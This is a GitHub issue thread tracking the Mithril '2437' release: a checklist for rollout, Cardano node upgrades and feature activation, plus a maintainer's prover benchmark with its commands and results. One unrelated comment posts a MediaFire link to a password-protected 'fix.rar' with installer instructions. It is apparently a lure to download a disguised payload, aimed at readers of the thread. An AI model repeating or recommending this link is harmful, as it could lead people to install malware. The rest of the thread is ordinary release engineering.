### ISSUE TITLE
Release `2437` distribution

### ISSUE THREAD

**Issue by jpraynaud** [input-output-hk/mithril#1901]
## Why
In order to deploy new features, improvements and bug fixes, we need to release a new distribution.

## What
Create and release a new distribution `2437`

> [!IMPORTANT]
> - [x] Activate Cardano transactions certification:
>   - [x] in `release-mainnet`
> - [x] Upgrade to Cardano node `9.1.1`:
>   - [x] in `pre-release-preview`
>   - [x] in `release-preprod`
>   - [x] in `release-mainnet`
> - [x] Breaking change in WASM client with unstable features
> - [x] Increase signature pace on `pre-release-preview`

Distribution +1:
> [!NOTE]
> - [ ] Make client for Cardano transactions stable
> - [ ] Update Cardano transactions preloader refresh interval default value in signer
> - [ ] Activate Cardano stake distribution certification:
>   - [ ] in `pre-release-preview`
>   - [ ] in `release-preprod`
>   - [ ] in `release-mainnet`

Distribution +2:
> [!NOTE]
> - [ ] Make client for Cardano stake distribution stable

### Phase 1: Prepare distribution
- [x] ~~Test backward compatibility with previous signer version(s)~~
- [x] Upgrade repository dependencies (with [runbook](https://github.com/input-output-hk/mithril/blob/main/docs/runbook/upgrade-repository-dependencies/README.md))
- [x] Check that all minor versions of all crates have been bumped for breaking change (if needed)
- [x] Check if versions of repository linked crates are correct for publication to `crates.io`(`mithril-common`, `mithril-client`)
- [x] Check if Cardano minimum supported versions in `networks.json` must be updated following the [runbook](https://github.com/input-output-hk/mithril/tree/main/docs/runbook/maintain-cardano-min-versions-file#readme)
- [x] Merge a PR for rotating the `CHANGELOG.md` (set the distribution version)
- [x] Create a draft PR for rotating the documentation

### Phase 2: Rollout pre-release distribution
- [x] Tag and deploy a `2437.0-pre` pre-release distribution on the `pre-release-preview` network 
- [x] Fill 'Highlights' and release notes section in the pre-release page on GitHub
- [x] Make sure `pre-release-preview` is working as expected 
- [x] Update the configuration of `pre-release-preview`:
  - [x] Upgrade the Cardano node version to `9.1.1`
- [x] Restart the `pre-release-preview` deployment in the CI
- [x] Make sure `pre-release-preview` is working as expected 
- [x] Make sure libraries version `next` have been published on [npm registry](https://www.npmjs.com/package/@mithril-dev/mithril-client-wasm)
- [x] Run an all green [client multi-platform test](https://github.com/input-output-hk/mithril/actions/workflows/test-client.yml) in the CI
- [x] Run an all green [aggregator stress test](https://github.com/input-output-hk/mithril/actions/workflows/aggregator-stress-test.yml) in the CI
- [x] Run a Cardano transaction prover benchmark:
  - [x] Store results in the issue
  - [x] ~~Make sure that there is no performance drop since last release~~
- [x] Announce the pre-release on discord channel
- [x] Announce any breaking change in:
  - [x] #cardano-scaling slack channel for pre-release
  - [x] #mithril-lace slack channel for pre-release
  - [x] #blockfrost-scaling slack channel for pre-release
- [x] Wait for at least `3` signers running the new version (could be more if era change is tested) over at least `2` epochs

### Phase 2: Rollout pre-release distribution fix
- [x] Tag and deploy a `2437.1-pre` pre-release distribution on the `pre-release-preview` network 
- [x] Fill 'Highlights' and release notes section in the pre-release page on GitHub
- [x] Make sure `pre-release-preview` is working as expected 
- [x] Announce the pre-release on discord channel
- [x] Update announcements of breaking change in:
  - [x] #cardano-scaling slack channel for pre-release
  - [x] #mithril-lace slack channel for pre-release
  - [x] #blockfrost-scaling slack channel for pre-release
- [x] Wait for at least `3` signers running the new version (could be more if era change is tested) over at least `2` epochs

### Phase 4: Rollout release distribution
- [x] Tag and deploy a `2437.1` release distribution on the `pre-release-preview` network
- [x] Fill highlights and release notes section in the release page on GitHub
- [x] Make sure `pre-release-preview` is working as expected
- [x] Update networks compatibility table in release notes
- [x] Update the configuration of `release-mainnet`:
  - [x] Upgrade the Cardano node version to `9.1.1` in `release-mainnet`
- [x] Release the `2437.1` distribution
- [x] Make sure `release-mainnet` is working as expected
- [x] Make sure `release-preprod` is working as expected
- [x] Update the configuration of `release-preprod`:
  - [x] Upgrade the Cardano node version to `9.1.1` in `release-preprod`
- [x] Restart the `release-preprod` deployment in the CI
- [x] Make sure `release-preprod` is working as expected
- [x] Make sure libraries have been published on [crates.io](https://crates.io/search?q=mithril)
- [x] Make sure libraries version `latest` have been published on [npm registry](https://www.npmjs.com/package/@mithril-dev/mithril-client-wasm)
- [x] Merge the PR for rotating the documentation
- [x] Merge a PR for rotating the `CHANGELOG.md` (updating the release date of the distribution and the versions table)
- [x] Announce the release on discord channel (with breaking-change, upcoming features activation, ...)
- [x] Announce any breaking/new feature change in:
  - [x] #cardano-scaling slack channel for release
  - [x] #mithril-lace slack channel for release
  - [x] #blockfrost-scaling slack channel for release
- [x] Dev blog post:
  - [x] Updates on the [Certification of Cardano transactions](https://mithril.network/doc/dev-blog/2024/07/30/cardano-transaction-certification) dev blog post
  - [x] New [Mithril client WASM breaking change](https://mithril.network/doc/dev-blog/2024/09/24/client-wasm-unstable-breaking-change) dev blog post.
    
### Phase 5: Activate features
- [x] Accelerate the pace of signature for Cardano transactions of `pre-release-preview`:
  - [x]  Signing configuration from `15` from tip of chain and every `15` blocks
- [x] Cardano transactions:
  - [x] When latest signer release is run by > 70% of the stake (within 2 weeks, or abort), 
  - [x] Activate the certification of Cardano transaction in `release-mainnet`
  - [x] Restart the `release-mainnet` deployment in the CI
  - [x] Make sure `release-mainnet` is working as expected
  - [x] Announce the release on discord channel
  - [x] Dev blog post: Activation of Cardano transaction in `release-mainnet`

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jpraynaud** [comment]
## Cardano transactions prover benchmark

> [!NOTE]
> run on GCP with `e2-highmem-2` machine with `2` vCPUs and `15GB` of RAM
> not during Cardano database snapshotting

- Benchmark results:

| **total_requests** | **concurrency** | **transactions/request** | **requests/s** |
|--------------------|-----------------|--------------------------|----------------|
| 500                | 50              | 1                        | 58.71          |
| 500                | 50              | 10                       | 49.19          |
| 500                | 50              | 20                       | 39.17          |
| 500                | 50              | 30                       | 34.11          |
| 500                | 50              | 40                       | 29.21          |
| 500                | 50              | 50                       | 24.39          |

- Command run:
```bash
# Aggregator endpoint
export AGGREGATOR_ENDPOINT=https://aggregator.pre-release-preview.api.mithril.network/aggregator

# Transactions file to prove
export TRANSACTIONS_FILE=transactions-preview.txt

# Transactions proved per request range definition
export TRANSACTIONS_PER_REQUEST_MIN=0
export TRANSACTIONS_PER_REQUEST_MAX=50
export TRANSACTIONS_PER_REQUEST_STEP=10

# Apache benchmark total request sent per benchmark
export AB_TOTAL_REQUESTS=500

# Apache benchmark concurrency level range definition
export AB_CONCURRENCY_MIN=50
export AB_CONCURRENCY_MAX=50
export AB_CONCURRENCY_STEP=50

# Run the benchmark:
./benchmark-aggregator-prover.sh
```

- Command result:
```bash
MITHRIL AGGREGATOR PROVER ROUTE BENCHMARK

>> Aggregator endpoint: https://aggregator.pre-release-preview.api.mithril.network/aggregator
>> Aggregator route: /proof/cardano-transaction
>> Transactions file: transactions-preview.txt
>> Transactions available: [100]
>> Transactions per request range: [0 10 20 30 40 50]
>> AB concurrency range: [50]
>> AB total requests per run: [500]
>> AB total runs: 6
>> Output file: benchmark.csv

>> [#1/6] Running stress test with 500 requests with 1 transactions per request and 50 concurrency
Completed 100 requests
Completed 200 requests
Completed 300 requests
Completed 400 requests
Completed 500 requests
Finished 500 requests
>>>> Success (58.71 requests/s)

>> [#2/6] Running stress test with 500 requests with 10 transactions per request and 50 concurrency
Completed 100 requests
Completed 200 requests
Completed 300 requests
Completed 400 requests
Completed 500 requests
Finished 500 requests
>>>> Success (49.19 requests/s)

>> [#3/6] Running stress test with 500 requests with 20 transactions per request and 50 concurrency
Completed 100 requests
Completed 200 requests
Completed 300 requests
Completed 400 requests
Completed 500 requests
Finished 500 requests
>>>> Success (39.17 requests/s)

>> [#4/6] Running stress test with 500 requests with 30 transactions per request and 50 concurrency
Completed 100 requests
Completed 200 requests
Completed 300 requests
Completed 400 requests
Completed 500 requests
Finished 500 requests
>>>> Success (34.11 requests/s)

>> [#5/6] Running stress test with 500 requests with 40 transactions per request and 50 concurrency
Completed 100 requests
Completed 200 requests
Completed 300 requests
Completed 400 requests
Completed 500 requests
Finished 500 requests
>>>> Success (29.21 requests/s)

>> [#6/6] Running stress test with 500 requests with 50 transactions per request and 50 concurrency
Completed 100 requests
Completed 200 requests
Completed 300 requests
Completed 400 requests
Completed 500 requests
Finished 500 requests
>>>> Success (24.39 requests/s)

>> Benchmark completed:

total_requests,concurrency,transactions/request,requests/s
500,50,1,58.71
500,50,10,49.19
500,50,20,39.17
500,50,30,34.11
500,50,40,29.21
500,50,50,24.39
```
